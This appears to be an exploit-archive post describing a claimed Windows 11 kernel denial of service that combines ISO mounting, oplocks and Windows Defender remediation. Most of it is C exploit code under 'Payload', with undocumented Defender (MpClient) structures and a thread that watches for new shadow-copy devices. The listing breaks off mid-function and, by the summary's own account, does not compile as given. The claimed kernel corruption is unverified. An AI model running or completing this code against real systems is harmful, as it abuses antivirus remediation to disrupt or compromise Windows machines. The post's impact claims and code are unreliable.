==================================================================================================================================
| # Title : Windows Kernel Logical Denial of Service via ISO Mount + Oplock Deserialization |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : Windows 11 25H2 (Build 26200) and later |
==================================================================================================================================
[+] Summary : A Logical Denial of Service (LDoS) condition reported against Windows 11 25H2 (Build 26200). The author states that ISO mounting, oplocks and Windows Defender scanning combine to leave the kernel in a permanently corrupted state. What the listing below actually does: it copies wermgr.exe out of a mounted ISO into a working directory, attaches an alternate data stream (":WDFOO") to the copy, drives a Defender scan and remediation of that file through the undocumented MpClient.dll exports (MpScanStart / MpThreatEnumerate / MpCleanStart), watches the object manager's \Device directory for a newly created HarddiskVolumeShadowCopy device, and renames the file via FileRenameInformationEx. Treat "permanent kernel state corruption" as the author's characterization: nothing in the code observes or verifies a kernel-side effect, so reproduce on a disposable VM before relying on the claim. Build caveats: the header names after each #include were lost in extraction and must be restored, and rawData[2] is declared with six initializers, which the compiler rejects until the array size is corrected.
[+] Payload :
#define _CRT_SECURE_NO_WARNINGS #define _WIN32_DCOM #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #pragma comment(lib, "kernel32.lib") #pragma comment(lib, "bcrypt.lib") #pragma comment(lib, "taskschd.lib") #pragma comment(lib, "comsupp.lib") #pragma comment(lib, "virtdisk.lib") #pragma comment(lib, "ntdll.lib") #pragma comment(lib, "Rpcrt4.lib") #pragma comment(lib, "shlwapi.lib") wchar_t zippath[MAX_PATH] = { 0 }; HMODULE ntdllhm = NULL; HANDLE g_poseidonevent = NULL; bool g_poseidonexit = false; char g_poseidonbuf[0x1000] = { 0 }; unsigned char rawData[2] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; NTSTATUS(WINAPI* _NtSetInformationFile)( HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass ) = NULL; NTSTATUS(WINAPI* _NtDeleteFile)( _In_ POBJECT_ATTRIBUTES ObjectAttributes ) = NULL; NTSTATUS(WINAPI* _NtOpenDirectoryObject)( PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes ) = NULL; NTSTATUS(WINAPI* _NtQueryDirectoryObject)( HANDLE DirectoryHandle, PVOID Buffer, ULONG Length, BOOLEAN ReturnSingleEntry, BOOLEAN 
RestartScan, PULONG Context, PULONG ReturnLength ) = NULL; NTSTATUS(WINAPI* _NtQueryInformationFile)( HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass ) = NULL; #define RtlOffsetToPointer(Base, Offset) ((PUCHAR)(((PUCHAR)(Base)) + ((ULONG_PTR)(Offset)))) namespace custom_defs { typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation, SystemTimeOfDayInformation, SystemPathInformation, SystemProcessInformation, SystemCallCountInformation, SystemDeviceInformation, SystemProcessorPerformanceInformation, SystemFlagsInformation, SystemCallTimeInformation, SystemModuleInformation, SystemLocksInformation, SystemStackTraceInformation, SystemPagedPoolInformation, SystemNonPagedPoolInformation, SystemHandleInformation, SystemObjectInformation, SystemPageFileInformation, SystemVdmInstemulInformation, SystemVdmBopInformation, SystemFileCacheInformation, SystemPoolTagInformation, SystemInterruptInformation, SystemDpcBehaviorInformation, SystemFullMemoryInformation, SystemLoadGdiDriverInformation, SystemUnloadGdiDriverInformation, SystemTimeAdjustmentInformation, SystemSummaryMemoryInformation, SystemMirrorMemoryInformation, SystemPerformanceTraceInformation, SystemObsolete0, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation, SystemExtendServiceTableInformation, SystemPrioritySeparation, SystemVerifierAddDriverInformation, SystemVerifierRemoveDriverInformation, SystemProcessorIdleInformation, SystemLegacyDriverInformation, SystemCurrentTimeZoneInformation, SystemLookasideInformation, SystemTimeSlipNotification, SystemSessionCreate, SystemSessionDetach, SystemSessionInformation, SystemRangeStartInformation, SystemVerifierInformation, SystemVerifierThunkExtend, SystemSessionProcessInformation, SystemLoadGdiDriverInSystemSpace, 
SystemNumaProcessorMap, SystemPrefetcherInformation, SystemExtendedProcessInformation, SystemRecommendedSharedDataAlignment, SystemComPlusPackage, SystemNumaAvailableMemory, SystemProcessorPowerInformation, SystemEmulationBasicInformation, SystemEmulationProcessorInformation, SystemExtendedHandleInformation, SystemLostDelayedWriteInformation, SystemBigPoolInformation, SystemSessionPoolTagInformation, SystemSessionMappedViewInformation, SystemHotpatchInformation, SystemObjectSecurityMode, SystemWatchdogTimerHandler, SystemWatchdogTimerInformation, SystemLogicalProcessorInformation, SystemWow64SharedInformationObsolete, SystemRegisterFirmwareTableInformationHandler, SystemFirmwareTableInformation, SystemModuleInformationEx, SystemVerifierTriageInformation, SystemSuperfetchInformation, SystemMemoryListInformation, SystemFileCacheInformationEx, SystemThreadPriorityClientIdInformation, SystemProcessorIdleCycleTimeInformation, SystemVerifierCancellationInformation, SystemProcessorPowerInformationEx, SystemRefTraceInformation, SystemSpecialPoolInformation, SystemProcessIdInformation, SystemErrorPortInformation, SystemBootEnvironmentInformation, SystemHypervisorInformation, SystemVerifierInformationEx, SystemTimeZoneInformation, SystemImageFileExecutionOptionsInformation, SystemCoverageInformation, SystemPrefetchPatchInformation, SystemVerifierFaultsInformation, SystemSystemPartitionInformation, SystemSystemDiskInformation, SystemProcessorPerformanceDistribution, SystemNumaProximityNodeInformation, SystemDynamicTimeZoneInformation, SystemCodeIntegrityInformation, SystemProcessorMicrocodeUpdateInformation, SystemProcessorBrandString, SystemVirtualAddressInformation, SystemLogicalProcessorAndGroupInformation, SystemProcessorCycleTimeInformation, SystemStoreInformation, SystemRegistryAppendString, SystemAitSamplingValue, SystemVhdBootInformation, SystemCpuQuotaInformation, SystemNativeBasicInformation, SystemErrorPortTimeouts, SystemLowPriorityIoInformation, 
SystemTpmBootEntropyInformation, SystemVerifierCountersInformation, SystemPagedPoolInformationEx, SystemSystemPtesInformationEx, SystemNodeDistanceInformation, SystemAcpiAuditInformation, SystemBasicPerformanceInformation, SystemQueryPerformanceCounterInformation, SystemSessionBigPoolInformation, SystemBootGraphicsInformation, SystemScrubPhysicalMemoryInformation, SystemBadPageInformation, SystemProcessorProfileControlArea, SystemCombinePhysicalMemoryInformation, SystemEntropyInterruptTimingInformation, SystemConsoleInformation, SystemPlatformBinaryInformation, SystemPolicyInformation, SystemHypervisorProcessorCountInformation, SystemDeviceDataInformation, SystemDeviceDataEnumerationInformation, SystemMemoryTopologyInformation, SystemMemoryChannelInformation, SystemBootLogoInformation, SystemProcessorPerformanceInformationEx, SystemCriticalProcessErrorLogInformation, SystemSecureBootPolicyInformation, SystemPageFileInformationEx, SystemSecureBootInformation, SystemEntropyInterruptTimingRawInformation, SystemPortableWorkspaceEfiLauncherInformation, SystemFullProcessInformation, SystemKernelDebuggerInformationEx, SystemBootMetadataInformation, SystemSoftRebootInformation, SystemElamCertificateInformation, SystemOfflineDumpConfigInformation, SystemProcessorFeaturesInformation, SystemRegistryReconciliationInformation, SystemEdidInformation, SystemManufacturingInformation, SystemEnergyEstimationConfigInformation, SystemHypervisorDetailInformation, SystemProcessorCycleStatsInformation, SystemVmGenerationCountInformation, SystemTrustedPlatformModuleInformation, SystemKernelDebuggerFlags, SystemCodeIntegrityPolicyInformation, SystemIsolatedUserModeInformation, SystemHardwareSecurityTestInterfaceResultsInformation, SystemSingleModuleInformation, SystemAllowedCpuSetsInformation, SystemVsmProtectionInformation, SystemInterruptCpuSetsInformation, SystemSecureBootPolicyFullInformation, SystemCodeIntegrityPolicyFullInformation, SystemAffinitizedInterruptProcessorInformation, 
SystemRootSiloInformation, SystemCpuSetInformation, SystemCpuSetTagInformation, SystemWin32WerStartCallout, SystemSecureKernelProfileInformation, SystemCodeIntegrityPlatformManifestInformation, SystemInterruptSteeringInformation, SystemSupportedProcessorArchitectures, SystemMemoryUsageInformation, SystemCodeIntegrityCertificateInformation, SystemPhysicalMemoryInformation, SystemControlFlowTransition, SystemKernelDebuggingAllowed, SystemActivityModerationExeState, SystemActivityModerationUserSettings, SystemCodeIntegrityPoliciesFullInformation, SystemCodeIntegrityUnlockInformation, SystemIntegrityQuotaInformation, SystemFlushInformation, SystemProcessorIdleMaskInformation, SystemSecureDumpEncryptionInformation, SystemWriteConstraintInformation, SystemKernelVaShadowInformation, SystemHypervisorSharedPageInformation, SystemFirmwareBootPerformanceInformation, SystemCodeIntegrityVerificationInformation, SystemFirmwarePartitionInformation, SystemSpeculationControlInformation, SystemDmaGuardPolicyInformation, SystemEnclaveLaunchControlInformation, SystemWorkloadAllowedCpuSetsInformation, SystemCodeIntegrityUnlockModeInformation, SystemLeapSecondInformation, SystemFlags2Information, SystemSecurityModelInformation, SystemCodeIntegritySyntheticCacheInformation, SystemFeatureConfigurationInformation, SystemFeatureConfigurationSectionInformation, SystemFeatureUsageSubscriptionInformation, SystemSecureSpeculationControlInformation, SystemSpacesBootInformation, SystemFwRamdiskInformation, SystemWheaIpmiHardwareInformation, SystemDifSetRuleClassInformation, SystemDifClearRuleClassInformation, SystemDifApplyPluginVerificationOnDriver, SystemDifRemovePluginVerificationOnDriver, SystemShadowStackInformation, SystemBuildVersionInformation, SystemPoolLimitInformation, SystemCodeIntegrityAddDynamicStore, SystemCodeIntegrityClearDynamicStores, SystemDifPoolTrackingInformation, SystemPoolZeroingInformation, SystemDpcWatchdogInformation, SystemDpcWatchdogInformation2, 
SystemSupportedProcessorArchitectures2, SystemSingleProcessorRelationshipInformation, SystemXfgCheckFailureInformation, SystemIommuStateInformation, SystemHypervisorMinrootInformation, SystemHypervisorBootPagesInformation, SystemPointerAuthInformation, SystemSecureKernelDebuggerInformation, SystemOriginalImageFeatureInformation, SystemMemoryNumaInformation, SystemMemoryNumaPerformanceInformation, SystemCodeIntegritySignedPoliciesFullInformation, SystemSecureCoreInformation, SystemTrustedAppsRuntimeInformation, SystemBadPageInformationEx, SystemResourceDeadlockTimeout, SystemBreakOnContextUnwindFailureInformation, SystemOslRamdiskInformation, SystemCodeIntegrityPolicyManagementInformation, SystemMemoryNumaCacheInformation, SystemProcessorFeaturesBitMapInformation, SystemRefTraceInformationEx, SystemBasicProcessInformation, SystemHandleCountInformation, SystemRuntimeAttestationReport, SystemPoolTagInformation2, SystemCodeIntegrityEndpointSecurityInformation, MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { PVOID Object; HANDLE UniqueProcessId; HANDLE HandleValue; ACCESS_MASK GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; _Field_size_(NumberOfHandles) SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; typedef enum _FILE_INFORMATION_CLASS { FileDirectoryInformation = 1, FileFullDirectoryInformation, FileBothDirectoryInformation, FileBasicInformation, FileStandardInformation, FileInternalInformation, FileEaInformation, FileAccessInformation, FileNameInformation, FileRenameInformation, FileLinkInformation, FileNamesInformation, FileDispositionInformation, FilePositionInformation, FileFullEaInformation, FileModeInformation, 
FileAlignmentInformation, FileAllInformation, FileAllocationInformation, FileEndOfFileInformation, FileAlternateNameInformation, FileStreamInformation, FilePipeInformation, FilePipeLocalInformation, FilePipeRemoteInformation, FileMailslotQueryInformation, FileMailslotSetInformation, FileCompressionInformation, FileObjectIdInformation, FileCompletionInformation, FileMoveClusterInformation, FileQuotaInformation, FileReparsePointInformation, FileNetworkOpenInformation, FileAttributeTagInformation, FileTrackingInformation, FileIdBothDirectoryInformation, FileIdFullDirectoryInformation, FileValidDataLengthInformation, FileShortNameInformation, FileIoCompletionNotificationInformation, FileIoStatusBlockRangeInformation, FileIoPriorityHintInformation, FileSfioReserveInformation, FileSfioVolumeInformation, FileHardLinkInformation, FileProcessIdsUsingFileInformation, FileNormalizedNameInformation, FileNetworkPhysicalNameInformation, FileIdGlobalTxDirectoryInformation, FileIsRemoteDeviceInformation, FileUnusedInformation, FileNumaNodeInformation, FileStandardLinkInformation, FileRemoteProtocolInformation, FileRenameInformationBypassAccessCheck, FileLinkInformationBypassAccessCheck, FileVolumeNameInformation, FileIdInformation, FileIdExtdDirectoryInformation, FileReplaceCompletionInformation, FileHardLinkFullIdInformation, FileIdExtdBothDirectoryInformation, FileDispositionInformationEx, FileRenameInformationEx, FileRenameInformationExBypassAccessCheck, FileDesiredStorageClassInformation, FileStatInformation, FileMemoryPartitionInformation, FileStatLxInformation, FileCaseSensitiveInformation, FileLinkInformationEx, FileLinkInformationExBypassAccessCheck, FileStorageReserveIdInformation, FileCaseSensitiveInformationForceAccessCheck, FileKnownFolderInformation, FileStatBasicInformation, FileId64ExtdDirectoryInformation, FileId64ExtdBothDirectoryInformation, FileIdAllExtdDirectoryInformation, FileIdAllExtdBothDirectoryInformation, FileStreamReservationInformation, 
FileMupProviderInfo, FileMaximumInformation } FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS; } typedef HANDLE MPHANDLE; typedef HANDLE* PMPHANDLE; typedef ULONG MPTHREAT_ID; typedef ULONG MPRESOURCE_CLASS; typedef LPWSTR MP_MIDL_STRING; typedef enum tagMPTHREAT_TYPE { MPTHREAT_TYPE_KNOWNBAD = 0, MPTHREAT_TYPE_BEHAVIOR = 1, MPTHREAT_TYPE_UNKNOWN = 2, MPTHREAT_TYPE_KNOWNGOOD = 3, MPTHREAT_TYPE_NIS = 4, MPTHREAT_TYPE_MAXVALUE = 4 } MPTHREAT_TYPE; typedef enum tagMPTHREAT_SOURCE { MPTHREAT_SOURCE_SCAN = 0, MPTHREAT_SOURCE_ACTIVE = 1, MPTHREAT_SOURCE_HISTORY = 2, MPTHREAT_SOURCE_QUARANTINE = 3, MPTHREAT_SOURCE_SIGNATURE = 4, MPTHREAT_SOURCE_STATE = 5, MPTHREAT_SOURCE_MAXVALUE = 5 } MPTHREAT_SOURCE; typedef enum tagMPSCAN_TYPE { MPSCAN_TYPE_UNKNOWN = 0, MPSCAN_TYPE_QUICK = 1, MPSCAN_TYPE_FULL = 2, MPSCAN_TYPE_RESOURCE = 3, MPSCAN_TYPE_MAXVALUE = 3 } MPSCAN_TYPE; typedef enum tagMPTHREAT_ACTION { MP_THREAT_ACTION_UNKNOWN = 0, MP_THREAT_ACTION_CLEAN = 1, MP_THREAT_ACTION_QUARANTINE = 2, MP_THREAT_ACTION_REMOVE = 3, MP_THREAT_ACTION_ALLOW = 6, MP_THREAT_ACTION_USERDEFINED = 8, MP_THREAT_ACTION_NOACTION = 9, MP_THREAT_ACTION_BLOCK = 10, MP_THREAT_ACTION_MAX_VALUE = 10 } MPTHREAT_ACTION; typedef struct tagMPTHREAT_INFO { MPTHREAT_ID ThreatID; GUID DetectionID; MP_MIDL_STRING Name; MPTHREAT_TYPE ThreatType; MPTHREAT_SEVERITY ThreatCriticality; MPTHREAT_CATEGORY ThreatCategory; DWORD ThreatShortDescriptionID; DWORD ThreatAdviseDescriptionID; MPTHREAT_STATUS ThreatStatus; DWORD SuggestedActionCount; MPTHREAT_ACTION SuggestedActionArray[10000]; DWORD ResourceCount; PVOID ResourceList[1024]; ULARGE_INTEGER ThreatStatusTime; HRESULT ThreatStatusCode; DWORD ThreatDetection; GUID QuarantineGuid; DWORD ExecutionStatus; PVOID Data; DWORD State; MP_MIDL_STRING DetectionUser; DWORD DetectionSource; MP_MIDL_STRING ProcessName; DWORD DetectionOrigin; DWORD reserved1; ULARGE_INTEGER DetectionTime; DWORD PreExecutionStatus; ULARGE_INTEGER RemediationTime; DWORD PostExecutionStatus; BOOL 
CriticalFailure; DWORD NonCriticalReason; MP_MIDL_STRING RemediationUser; DWORD RemediationResourceCount; PVOID RemediationResourceList[1024]; BOOL FailureResolved; DWORD ResolvedReason; DWORD AdditionalActions; DWORD ResolvedActions; DWORD dwThreatStatusFlag; } MPTHREAT_INFO, * PMPTHREAT_INFO; typedef struct tagMPRESOURCE_INFO { MP_MIDL_STRING Scheme; MP_MIDL_STRING Path; MPRESOURCE_CLASS Class; } MPRESOURCE_INFO, * PMPRESOURCE_INFO; typedef struct tagMPSCAN_RESOURCES { DWORD dwResourceCount; PMPRESOURCE_INFO pResourceList; } MPSCAN_RESOURCES, * PMPSCAN_RESOURCES; typedef struct tagMPCALLBACK_INFO { void* CallbackHandler; __int64 v4; } MPCALLBACK_INFO, * PMPCALLBACK_INFO; typedef struct _FILE_BASIC_INFORMATION { LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; ULONG FileAttributes; } FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION; typedef struct _FILE_RENAME_INFORMATION { union { BOOLEAN ReplaceIfExists; ULONG Flags; } DUMMYUNIONNAME; HANDLE RootDirectory; ULONG FileNameLength; WCHAR FileName[1]; } FILE_RENAME_INFORMATION, * PFILE_RENAME_INFORMATION; typedef struct _REPARSE_DATA_BUFFER { ULONG ReparseTag; USHORT ReparseDataLength; USHORT Reserved; union { struct { USHORT SubstituteNameOffset; USHORT SubstituteNameLength; USHORT PrintNameOffset; USHORT PrintNameLength; ULONG Flags; WCHAR PathBuffer[1]; } SymbolicLinkReparseBuffer; struct { USHORT SubstituteNameOffset; USHORT SubstituteNameLength; USHORT PrintNameOffset; USHORT PrintNameLength; WCHAR PathBuffer[1]; } MountPointReparseBuffer; struct { UCHAR DataBuffer[1]; } GenericReparseBuffer; } DUMMYUNIONNAME; } REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER; #define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer) #define REPARSE_GUID_DATA_BUFFER_HEADER_SIZE 0x8 typedef struct _FILE_DISPOSITION_INFORMATION_EX { ULONG Flags; } FILE_DISPOSITION_INFORMATION_EX, * PFILE_DISPOSITION_INFORMATION_EX; 
// One entry as returned by NtQueryDirectoryObject: the object's name and its
// type name (e.g. "Device").  The scanning loops below pre-zero the buffer and
// treat an all-zero entry as the end of the returned array.
typedef struct _OBJECT_DIRECTORY_INFORMATION {
    UNICODE_STRING Name;
    UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;

// Singly linked list of "HarddiskVolumeShadowCopyN" device names.  Used to
// snapshot the shadow copies that exist before remediation so a newly created
// one can be recognised afterwards.
struct LLShadowVolumeNames {
    wchar_t* name;             // heap copy of the device name, NUL-terminated
    LLShadowVolumeNames* next; // NULL on the last node
};

// Frees every node (and its name) of a list built by RetrieveCurrentVSSList.
// Passing NULL is a no-op.
void DestroyVSSNamesList(LLShadowVolumeNames* First) {
    while (First) {
        free(First->name);
        LLShadowVolumeNames* next = First->next;
        free(First);
        First = next;
    }
}

// Enumerates the object-manager directory behind `hobjdir` (the caller opens
// "\Device") and collects every entry of type "Device" whose name begins with
// "HarddiskVolumeShadowCopy".
//   vscnumber   - receives the number of matches.
//   criticalerr - set to true on any failure; errorcode then holds a Win32 code.
// Returns the list head, or NULL (with *criticalerr == false) when no shadow
// copies exist.  The caller owns the list and frees it with DestroyVSSNamesList.
LLShadowVolumeNames* RetrieveCurrentVSSList(HANDLE hobjdir, bool* criticalerr, int* vscnumber, DWORD* errorcode) {
    if (!criticalerr || !vscnumber || !errorcode) return NULL;
    *vscnumber = 0;
    ULONG scanctx = 0;
    // Initial buffer: one entry plus room for two maximum-length UNICODE_STRINGs.
    ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
    ULONG retsz = 0;
    OBJECT_DIRECTORY_INFORMATION* objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
    if (!objdirinfo) {
        printf("[!] Failed to allocate buffer for object manager directory query.\n");
        *criticalerr = true;
        *errorcode = ERROR_NOT_ENOUGH_MEMORY;
        return NULL;
    }
    ZeroMemory(objdirinfo, reqsz);
    NTSTATUS stat = STATUS_SUCCESS;
    do {
        stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, FALSE, &scanctx, &retsz);
        if (stat == STATUS_SUCCESS) break;
        else if (stat != STATUS_MORE_ENTRIES) {
            printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
            *criticalerr = true;
            *errorcode = RtlNtStatusToDosError(stat);
            return NULL; // NOTE(review): objdirinfo is leaked on this path
        }
        // STATUS_MORE_ENTRIES: the buffer was too small, grow it and query again.
        // NOTE(review): scanctx is not reset to 0 before the retry, so whatever the
        // short call already returned is not re-read by the larger one; this only
        // matters if the initial buffer is ever too small for "\Device".
        free(objdirinfo);
        reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
        objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
        if (!objdirinfo) {
            printf("[!] Failed to allocate required buffer to query object manager directory.\n");
            *criticalerr = true;
            *errorcode = ERROR_NOT_ENOUGH_MEMORY;
            return NULL;
        }
        ZeroMemory(objdirinfo, reqsz);
    } while (1);
    // An all-zero entry terminates the array (the buffer was zeroed before the query).
    // NOTE(review): the malloc result is not NULL-checked before ZeroMemory.
    void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
    ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
    LLShadowVolumeNames* LLVSScurrent = NULL;
    LLShadowVolumeNames* LLVSSfirst = NULL;
    for (ULONG i = 0; i < ULONG_MAX; i++) {
        if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
            free(emptybuff); // NOTE(review): only freed here; the error returns below leak it
            break;
        }
        // Assumes the returned TypeName/Name buffers are NUL-terminated (they are
        // compared and copied as C strings further down).
        if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
            wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
            // sizeof(cmpstr) includes the terminator, so the name must be strictly
            // longer than the prefix; the prefix compare itself is case-sensitive.
            if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
                if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
                    (*vscnumber)++;
                    if (LLVSScurrent) {
                        // Append a new node after the current tail.
                        LLVSScurrent->next = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
                        if (!LLVSScurrent->next) {
                            printf("[!] Failed to allocate memory.\n");
                            *criticalerr = true;
                            *errorcode = ERROR_NOT_ENOUGH_MEMORY;
                            DestroyVSSNamesList(LLVSSfirst);
                            free(objdirinfo);
                            return NULL;
                        }
                        ZeroMemory(LLVSScurrent->next, sizeof(LLShadowVolumeNames));
                        LLVSScurrent = LLVSScurrent->next;
                        // Name.Length is in bytes; one extra wchar_t for the terminator.
                        LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
                        if (!LLVSScurrent->name) {
                            printf("[!] Failed to allocate memory.\n");
                            *errorcode = ERROR_NOT_ENOUGH_MEMORY;
                            *criticalerr = true;
                            DestroyVSSNamesList(LLVSSfirst);
                            free(objdirinfo);
                            return NULL;
                        }
                        ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
                        memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
                    } else {
                        // First match: create the list head.
                        LLVSSfirst = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
                        if (!LLVSSfirst) {
                            printf("[!] Failed to allocate memory.\n");
                            *errorcode = ERROR_NOT_ENOUGH_MEMORY;
                            *criticalerr = true;
                            DestroyVSSNamesList(LLVSSfirst);
                            free(objdirinfo);
                            return NULL;
                        }
                        ZeroMemory(LLVSSfirst, sizeof(LLShadowVolumeNames));
                        LLVSScurrent = LLVSSfirst;
                        LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
                        if (!LLVSScurrent->name) {
                            printf("[!] Failed to allocate memory.\n");
                            *errorcode = ERROR_NOT_ENOUGH_MEMORY;
                            *criticalerr = true;
                            DestroyVSSNamesList(LLVSSfirst);
                            free(objdirinfo);
                            return NULL;
                        }
                        ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
                        memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
                    }
                }
            }
        }
    }
    free(objdirinfo);
    return LLVSSfirst;
}

// Worker thread: snapshots the current shadow copies, then polls "\Device"
// until a HarddiskVolumeShadowCopy device appears that was not in the snapshot,
// opens "<device>\Windows" on it to confirm it is reachable, and copies the new
// device path into `fullvsspath` (a caller-supplied wchar_t[MAX_PATH]) if non-NULL.
// Returns a Win32 error code (ERROR_SUCCESS on success).
// NOTE(review): both waits are tight loops with no Sleep - the `goto scanagain`
// polling loop re-enumerates "\Device" continuously, and the `retry` loop spins
// on STATUS_NO_SUCH_DEVICE - so this thread burns a full core until the event
// occurs and never times out.
DWORD WINAPI ShadowCopyFinderThread(void* fullvsspath) {
    wchar_t devicepath[] = L"\\Device";
    UNICODE_STRING udevpath = { 0 };
    RtlInitUnicodeString(&udevpath, devicepath);
    OBJECT_ATTRIBUTES objattr = { 0 };
    InitializeObjectAttributes(&objattr, &udevpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    NTSTATUS stat = STATUS_SUCCESS;
    HANDLE hobjdir = NULL;
    DWORD retval = ERROR_SUCCESS;
    wchar_t newvsspath[MAX_PATH] = { 0 };
    wcscpy(newvsspath, L"\\Device\\"); // the new device name is appended below
    bool criterr = false;
    int vscnum = 0;
    bool restartscan = false;
    ULONG scanctx = 0;
    ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
    ULONG retsz = 0;
    OBJECT_DIRECTORY_INFORMATION* objdirinfo = NULL;
    bool srchfound = false;
    wchar_t vsswinpath[MAX_PATH] = { 0 };
    UNICODE_STRING _vsswinpath = { 0 };
    OBJECT_ATTRIBUTES objattr2 = { 0 };
    IO_STATUS_BLOCK iostat = { 0 };
    HANDLE hlk = NULL;
    LLShadowVolumeNames* vsinitial = NULL;
    // 0x0001 is DIRECTORY_QUERY - enough to enumerate the directory.
    stat = _NtOpenDirectoryObject(&hobjdir, 0x0001, &objattr);
    if (stat) {
        printf("[!] Failed to open object manager directory, error: 0x%0.8X\n", stat);
        retval = RtlNtStatusToDosError(stat);
        return retval;
    }
    void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
    if (!emptybuff) {
        printf("[!] Failed to allocate memory.\n");
        retval = ERROR_NOT_ENOUGH_MEMORY;
        goto cleanup;
    }
    ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
    // Baseline: the shadow copies that already exist.
    vsinitial = RetrieveCurrentVSSList(hobjdir, &criterr, &vscnum, &retval);
    if (criterr) {
        printf("[!] Unexpected error while listing current volume shadow copy volumes.\n");
        goto cleanup;
    }
    if (!vsinitial) {
        printf("[*] No volume shadow copies were found.\n");
    } else {
        printf("[*] Found %d volume shadow copies.\n", vscnum);
    }
    stat = STATUS_SUCCESS;
scanagain:
    // Re-enumerate "\Device" from the start; the buffer is re-allocated on every pass.
    do {
        if (objdirinfo) free(objdirinfo);
        objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
        if (!objdirinfo) {
            printf("[!] Failed to allocate required buffer to query object manager directory.\n");
            retval = ERROR_NOT_ENOUGH_MEMORY;
            goto cleanup;
        }
        ZeroMemory(objdirinfo, reqsz);
        scanctx = 0;
        stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, restartscan, &scanctx, &retsz);
        if (stat == STATUS_SUCCESS) break;
        else if (stat != STATUS_MORE_ENTRIES) {
            printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
            retval = RtlNtStatusToDosError(stat);
            goto cleanup;
        }
        reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
    } while (1);
    for (ULONG i = 0; i < ULONG_MAX; i++) {
        if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
            break;
        }
        if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
            wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
            if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
                if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
                    // Skip shadow copies that were already present in the baseline.
                    LLShadowVolumeNames* current = vsinitial;
                    bool found = false;
                    while (current) {
                        if (_wcsicmp(current->name, objdirinfo[i].Name.Buffer) == 0) {
                            found = true;
                            break;
                        }
                        current = current->next;
                    }
                    if (found) continue;
                    else {
                        srchfound = true;
                        wcscat(newvsspath, objdirinfo[i].Name.Buffer);
                        break;
                    }
                }
            }
        }
